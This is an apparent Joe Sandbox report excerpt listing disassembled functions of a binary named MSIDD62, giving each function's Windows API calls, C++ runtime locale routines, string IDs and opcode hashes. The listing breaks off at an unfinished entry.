                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Locinfo::_Lockit$AllocConcurrency::cancel_current_taskLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                      • String ID: bad locale name$false$true
                                                                      • API String ID: 975656625-1062449267
                                                                      • Opcode ID: 8bb68f5871c6fb835b18df4ff07d57ffd89bd929ad8c806085238b96d5108943
                                                                      • Instruction ID: d37d4a9e7179aa4cc7245c6add5c9d5ba4ff1bd11c1c5567991a208376ffe481
                                                                      • Opcode Fuzzy Hash: 8bb68f5871c6fb835b18df4ff07d57ffd89bd929ad8c806085238b96d5108943
                                                                      • Instruction Fuzzy Hash: 51B194B1D00398DEEB21CFA5C9457DEBBF4BF14304F1482AEE544AB281E7B59A48CB51
                                                                      Function 003E6A60 Relevance: 15.1, APIs: 10, Instructions: 137timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • OpenProcess.KERNEL32(00000400,00000000,?,755CD0F6,?,00000000), ref: 003E6AC2
                                                                      • OpenProcess.KERNEL32(00000400,00000000,00000000,?,755CD0F6,?,00000000), ref: 003E6AE3
                                                                      • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,755CD0F6,?,00000000), ref: 003E6B16
                                                                      • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,755CD0F6,?,00000000), ref: 003E6B27
                                                                      • CloseHandle.KERNEL32(00000000,?,755CD0F6,?,00000000), ref: 003E6B45
                                                                      • CloseHandle.KERNEL32(00000000,?,755CD0F6,?,00000000), ref: 003E6B61
                                                                      • CloseHandle.KERNEL32(00000000,?,755CD0F6,?,00000000), ref: 003E6B89
                                                                      • CloseHandle.KERNEL32(00000000,?,755CD0F6,?,00000000), ref: 003E6BA5
                                                                      • CloseHandle.KERNEL32(00000000,?,755CD0F6,?,00000000), ref: 003E6BC3
                                                                      • CloseHandle.KERNEL32(00000000,?,755CD0F6,?,00000000), ref: 003E6BDF
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle$Process$OpenTimes
                                                                      • String ID:
                                                                      • API String ID: 1711917922-0
                                                                      • Opcode ID: 6a32160eb9abce5dee8ee632c847e6230db69221703f1878b11b150923296b90
                                                                      • Instruction ID: c3332f7ff175b5a291c3035aff3665fcb22d54c7ae428c69ec270528047ab66f
                                                                      • Opcode Fuzzy Hash: 6a32160eb9abce5dee8ee632c847e6230db69221703f1878b11b150923296b90
                                                                      • Instruction Fuzzy Hash: 43515F70E01269EBDB11CF9AC985BEEFBB5AB58714F208219E514B73C0C7B45D01CBA8
                                                                      Function 00400834 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 351COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 0040083B
                                                                        • Part of subcall function 003F780A: __EH_prolog3.LIBCMT ref: 003F7811
                                                                        • Part of subcall function 003F780A: std::_Lockit::_Lockit.LIBCPMT ref: 003F781B
                                                                        • Part of subcall function 003F780A: std::_Lockit::~_Lockit.LIBCPMT ref: 003F788C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
                                                                      • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                      • API String ID: 1538362411-2891247106
                                                                      • Opcode ID: dbddf87328ffe3bf29a37b6463842d90e753a904d47ad3f0fa79dda4125fe4c2
                                                                      • Instruction ID: 255e81a332aafb492a6943641a8e85ed63b425f2a5dab3ad53a3c7172f0b32a1
                                                                      • Opcode Fuzzy Hash: dbddf87328ffe3bf29a37b6463842d90e753a904d47ad3f0fa79dda4125fe4c2
                                                                      • Instruction Fuzzy Hash: CEC1B2B254010AAFDB19DF98C996FFF7BB8AB15304F14012BFA42B7291D634DA00DB65
                                                                      Function 004059E2 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 351COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 004059E9
                                                                        • Part of subcall function 003EC590: std::_Lockit::_Lockit.LIBCPMT ref: 003EC5BD
                                                                        • Part of subcall function 003EC590: std::_Lockit::_Lockit.LIBCPMT ref: 003EC5E0
                                                                        • Part of subcall function 003EC590: std::_Lockit::~_Lockit.LIBCPMT ref: 003EC608
                                                                        • Part of subcall function 003EC590: std::_Lockit::~_Lockit.LIBCPMT ref: 003EC6A7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                      • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                      • API String ID: 1383202999-2891247106
                                                                      • Opcode ID: 14e68ca2383ec9fa6b7cd896350f1245d28d0146a883be4b99c212604438234d
                                                                      • Instruction ID: 0a520b8e654d80b27f36c8a5424e8c236e1767b77337a3f29d240c7ebe108f10
                                                                      • Opcode Fuzzy Hash: 14e68ca2383ec9fa6b7cd896350f1245d28d0146a883be4b99c212604438234d
                                                                      • Instruction Fuzzy Hash: 40C14076500609AEDB14DF58C999DFB3BB8EF45304F14452BFA02F6291D638EA00CF69
                                                                      Function 00400C24 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 351COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00400C2B
                                                                        • Part of subcall function 003EB500: std::_Lockit::_Lockit.LIBCPMT ref: 003EB52D
                                                                        • Part of subcall function 003EB500: std::_Lockit::_Lockit.LIBCPMT ref: 003EB550
                                                                        • Part of subcall function 003EB500: std::_Lockit::~_Lockit.LIBCPMT ref: 003EB578
                                                                        • Part of subcall function 003EB500: std::_Lockit::~_Lockit.LIBCPMT ref: 003EB617
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                      • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                      • API String ID: 1383202999-2891247106
                                                                      • Opcode ID: 1c2cf23dfa3c4dc3595f2cfb7b4c9122d6b6f177dc1620175e2c128fdf3aa9d8
                                                                      • Instruction ID: cba80ec2553485ed7afe9cf7b15e1df5a74fd3ba5ea760020670812e33edba5b
                                                                      • Opcode Fuzzy Hash: 1c2cf23dfa3c4dc3595f2cfb7b4c9122d6b6f177dc1620175e2c128fdf3aa9d8
                                                                      • Instruction Fuzzy Hash: E8C1817250010AABDB29DFA8C955FFF3BA8EF05300F14452BFA06B6291D774DA01DB65
                                                                      Function 003E65B0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 258libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 003E6090: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 003E60F4
                                                                        • Part of subcall function 003E6090: GetLastError.KERNEL32 ref: 003E6190
                                                                      • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 003E6632
                                                                      • ReadProcessMemory.KERNEL32(00000000,?,?,000001D8,00000000,?,?,?,?,00000000), ref: 003E668B
                                                                      • ReadProcessMemory.KERNEL32(00000000,?,?,00000048,00000000,?,?,?,?,?,?,?,00000000), ref: 003E6712
                                                                      • ReadProcessMemory.KERNEL32(00000000,?,?,?,00000000,?,00000000,?,?,?,?,?,?,?,00000000), ref: 003E67F6
                                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 003E686E
                                                                      • GetLastError.KERNEL32(?,00000000), ref: 003E68C9
                                                                      • FreeLibrary.KERNEL32(?,?,00000000), ref: 003E691E
                                                                      Strings
                                                                      • NtQueryInformationProcess, xrefs: 003E662C
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead$ErrorFreeLast$AddressDirectoryLibraryLocalProcSystem
                                                                      • String ID: NtQueryInformationProcess
                                                                      • API String ID: 253270903-2781105232
                                                                      • Opcode ID: f0a6b04105940df6293f76773f8768cb272f9a716925136ef1888eeba5616ea0
                                                                      • Instruction ID: 7f2fb8da700d5a668ac4acc2769a8e58c6c2cb77d75c35645cef96f1d59a243a
                                                                      • Opcode Fuzzy Hash: f0a6b04105940df6293f76773f8768cb272f9a716925136ef1888eeba5616ea0
                                                                      • Instruction Fuzzy Hash: 25B1A070D10758CADB20CF61C9497AEBBF4FF58308F20465EE449A7690D7B866C8CB95
                                                                      Function 003E2BD0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 225encryptionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • #224.MSI(?,00000001,00000000,00000000,00000000), ref: 003E2C43
                                                                      • LocalFree.KERNEL32(?), ref: 003E2CA2
                                                                      • LocalFree.KERNEL32(?), ref: 003E2D0C
                                                                      • CertFreeCertificateContext.CRYPT32(00000000), ref: 003E2E94
                                                                        • Part of subcall function 003E3D60: CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 003E3DA3
                                                                      • LocalFree.KERNEL32(?), ref: 003E2E13
                                                                      • LocalFree.KERNEL32(?), ref: 003E2E6B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Free$Local$Cert$#224CertificateContextNameString
                                                                      • String ID: H:D$Jm
                                                                      • API String ID: 2665452496-4264341832
                                                                      • Opcode ID: 35835e07d2b14e54d0bb785e5a4dc5a9a3ac05c07862b6d7ce025f6bf970b4d3
                                                                      • Instruction ID: f53aed865c738ea94a820c11c853b668d28ab0339683d1694584da6db7564497
                                                                      • Opcode Fuzzy Hash: 35835e07d2b14e54d0bb785e5a4dc5a9a3ac05c07862b6d7ce025f6bf970b4d3
                                                                      • Instruction Fuzzy Hash: 0091AE70D10299CFDB19CFA9C948B9EBBB5FF84304F20461DD015AB291D7B5AA84CB90
                                                                      Function 003FD491 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 78COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3_GS.LIBCMT ref: 003FD498
                                                                      • _Maklocstr.LIBCPMT ref: 003FD501
                                                                      • _Maklocstr.LIBCPMT ref: 003FD513
                                                                      • _Maklocchr.LIBCPMT ref: 003FD52B
                                                                      • _Maklocchr.LIBCPMT ref: 003FD53B
                                                                      • _Getvals.LIBCPMT ref: 003FD55D
                                                                        • Part of subcall function 003F708B: _Maklocchr.LIBCPMT ref: 003F70BA
                                                                        • Part of subcall function 003F708B: _Maklocchr.LIBCPMT ref: 003F70D0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                      • String ID: false$true
                                                                      • API String ID: 3549167292-2658103896
                                                                      • Opcode ID: e5921731693836cac34bccd1a403d2154fd95d813b49ea9703c95e92c9799155
                                                                      • Instruction ID: 5b9dfc4af28036cfe395cf571b3e30e9ee562724f82d98956126ed134ba37f9a
                                                                      • Opcode Fuzzy Hash: e5921731693836cac34bccd1a403d2154fd95d813b49ea9703c95e92c9799155
                                                                      • Instruction Fuzzy Hash: 34217171D00318BADF16EFA5D886AEE7B68EF05710F00841BBA199F192EB749540CBA1
                                                                      Function 003EC9C0 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 480COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 003F5C66: __EH_prolog3.LIBCMT ref: 003F5C6D
                                                                        • Part of subcall function 003F5C66: std::_Lockit::_Lockit.LIBCPMT ref: 003F5C78
                                                                        • Part of subcall function 003F5C66: std::locale::_Setgloballocale.LIBCPMT ref: 003F5C93
                                                                        • Part of subcall function 003F5C66: std::_Lockit::~_Lockit.LIBCPMT ref: 003F5CE6
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003ECA1A
                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 003ECA80
                                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 003ECB4F
                                                                        • Part of subcall function 003F45A7: __EH_prolog3.LIBCMT ref: 003F45AE
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003ECC00
                                                                      • LocalFree.KERNEL32(?,?,?,0043B6C9,00000000,0043B6C9), ref: 003ECD01
                                                                      • __cftoe.LIBCMT ref: 003ECE5E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$H_prolog3Locinfo::_Lockit::_Lockit::~_$FreeLocalLocinfo_ctorLocinfo_dtorSetgloballocale__cftoestd::locale::_
                                                                      • String ID: bad locale name
                                                                      • API String ID: 2085124900-1405518554
                                                                      • Opcode ID: 9d609ecb528f6c48f317b706f35e5fba6a6e097ff2f37d2ad768d7bc92de93ed
                                                                      • Instruction ID: aa7767b1620f72248ce2229249fd8d4f3a1b000f1c7e6709b623b1f7a39a3973
                                                                      • Opcode Fuzzy Hash: 9d609ecb528f6c48f317b706f35e5fba6a6e097ff2f37d2ad768d7bc92de93ed
                                                                      • Instruction Fuzzy Hash: 1F12AF71E10299DFDF11CFA9C885BAEBBF5EF04304F144269E815AB381E735AA05CB91
                                                                      Function 0040B22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • type_info::operator==.LIBVCRUNTIME ref: 0040B34B
                                                                      • ___TypeMatch.LIBVCRUNTIME ref: 0040B459
                                                                      • _UnwindNestedFrames.LIBCMT ref: 0040B5AB
                                                                      • CallUnexpected.LIBVCRUNTIME ref: 0040B5C6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 2751267872-393685449
                                                                      • Opcode ID: 938b4d58193062096a934a215ab53d0f9201d7f94cb3e63aacea08c0da42a74f
                                                                      • Instruction ID: 2f07407eb5a4318e3daeaa54d7e30c4530a8e6d29c552e61df1dd77841428959
                                                                      • Opcode Fuzzy Hash: 938b4d58193062096a934a215ab53d0f9201d7f94cb3e63aacea08c0da42a74f
                                                                      • Instruction Fuzzy Hash: A8B13571800209EFCF15DFA5C8819AEB7B5EF14318B1481ABE8017B292D739DA51CBDA
                                                                      Function 003F0260 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 269memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 003F0322
                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 003F0367
                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 003F03DE
                                                                      • LocalFree.KERNEL32(?), ref: 003F041B
                                                                      • LocalFree.KERNEL32(?,?,?,?,?,755CD0F6,755CD0F6,?,?), ref: 003F0546
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Local$AllocFree$___std_exception_copy
                                                                      • String ID: ios_base::failbit set$iostream
                                                                      • API String ID: 2276494016-302468714
                                                                      • Opcode ID: 7ecda72d8b6760f36c1087cfef66932a9a5dfee21579cd1e52a47f59ff87e790
                                                                      • Instruction ID: bdd490a89316dea442480bebfe934a3a6ae98a6e978e12a4473e1c60263e8bb3
                                                                      • Opcode Fuzzy Hash: 7ecda72d8b6760f36c1087cfef66932a9a5dfee21579cd1e52a47f59ff87e790
                                                                      • Instruction Fuzzy Hash: B0A1A1B1D00208DFDB09CF69D984BAEFBB5FB48310F10826EE515AB392DB749940CB95
                                                                      Function 003EBA30 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 195memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,00000044,755CD0F6,?,00000000), ref: 003EBA8B
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003EBAC8
                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 003EBB35
                                                                      • __Getctype.LIBCPMT ref: 003EBB7E
                                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 003EBBF2
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003EBCAF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Locinfo::_Lockit$AllocGetctypeLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                      • String ID: bad locale name
                                                                      • API String ID: 3635123611-1405518554
                                                                      • Opcode ID: 45298b7ebd595602ade737cc2893e03b0449b869ca8ecaa37840e361c90589c4
                                                                      • Instruction ID: 1ead2bf5be80c6b28508cebf6253448d01ed5895297d59eaa86217dee16c51f4
                                                                      • Opcode Fuzzy Hash: 45298b7ebd595602ade737cc2893e03b0449b869ca8ecaa37840e361c90589c4
                                                                      • Instruction Fuzzy Hash: 1781B6B0D04398DFEB22CFA9C94579EFBF4AF14304F2482ADD444AB291EB759A44CB51
                                                                      Function 003EC220 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 170memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,00000018,755CD0F6,?,00000000,?,?,?,?,?,?,?,00000000,0042ABC5,000000FF), ref: 003EC264
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003EC29E
                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 003EC302
                                                                      • __Getctype.LIBCPMT ref: 003EC34B
                                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 003EC391
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003EC445
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Locinfo::_Lockit$AllocGetctypeLocalLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                      • String ID: bad locale name
                                                                      • API String ID: 3635123611-1405518554
                                                                      • Opcode ID: 7968538db73ff8bec0cb6ba9ebc07791bb7441bb1eaf16e1fa83881130296cc2
                                                                      • Instruction ID: 68c1a01ba0f84cac205fa46c8260056dbddd5d5ed868e0b3c527d0784b807948
                                                                      • Opcode Fuzzy Hash: 7968538db73ff8bec0cb6ba9ebc07791bb7441bb1eaf16e1fa83881130296cc2
                                                                      • Instruction Fuzzy Hash: 69616EB0D01298EEEB12CFE9C5447DEBBF4AF15304F1482A9E454AB3C1D7B99A09CB51
                                                                      Function 0040743E Relevance: 12.2, APIs: 8, Instructions: 224COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCPInfo.KERNEL32(?,?,?,?,?), ref: 004074C9
                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00407557
                                                                      • __alloca_probe_16.LIBCMT ref: 00407581
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004075C9
                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 004075E3
                                                                      • __alloca_probe_16.LIBCMT ref: 00407609
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00407646
                                                                      • CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00407663
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$__alloca_probe_16$CompareInfoString
                                                                      • String ID:
                                                                      • API String ID: 3603178046-0
                                                                      • Opcode ID: 9923feb5307d1df28ac4b6ea2d4b99e2feee8f5673c0a707003f2b710833db43
                                                                      • Instruction ID: 535b7c01805a903efcabd96bb8335c983547ec389335a0ea4893a104a83cd878
                                                                      • Opcode Fuzzy Hash: 9923feb5307d1df28ac4b6ea2d4b99e2feee8f5673c0a707003f2b710833db43
                                                                      • Instruction Fuzzy Hash: 0971C771D08616ABDF218F58CC45AEF7BB5AF49364F14043BE405B62D1DB3AE801CB6A
                                                                      Function 00406F23 Relevance: 12.2, APIs: 8, Instructions: 175COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
